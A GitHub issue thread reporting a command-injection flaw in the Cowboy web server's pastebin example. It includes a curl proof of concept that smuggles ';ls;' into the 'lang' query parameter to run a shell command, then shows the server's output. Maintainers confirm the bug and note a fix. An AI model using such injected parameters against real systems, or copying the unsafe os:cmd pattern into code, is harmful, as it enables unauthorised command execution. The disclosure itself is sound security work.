### ISSUE TITLE
Time to fix pastbin example

### ISSUE THREAD

**Issue by wasiher** [ninenines/cowboy#1396]
Pastbin example has remote code execution.
**Request:**
```
curl -i 'http://localhost:8080/FQaCezgP?lang=;ls;'  # replace FQaCezgP with valid paste_id
```
**Response:**
```
HTTP/1.1 200 OK
content-length: 137
content-type: text/plain
date: Sun, 04 Aug 2019 10:18:03 GMT
server: Cowboy
vary: accept

/bin/sh: 1: highlight: not found
bin
erts-8.2.1
lib
log
releases
rest_pastebin_example-1.tar.gz
/bin/sh: 1: --doc-title=paste: not found
```
**Why?**
os:cmd is not designed to work with lists of strings
https://github.com/ninenines/cowboy/blob/master/examples/rest_pastebin/src/toppage_h.erl#L114

**Comment by essen** [comment]
Obviously. Patch welcome of course.

**Comment by essen** [comment]
Fixed in d5814a59f40a0347d990444d418f995ff10a8109.
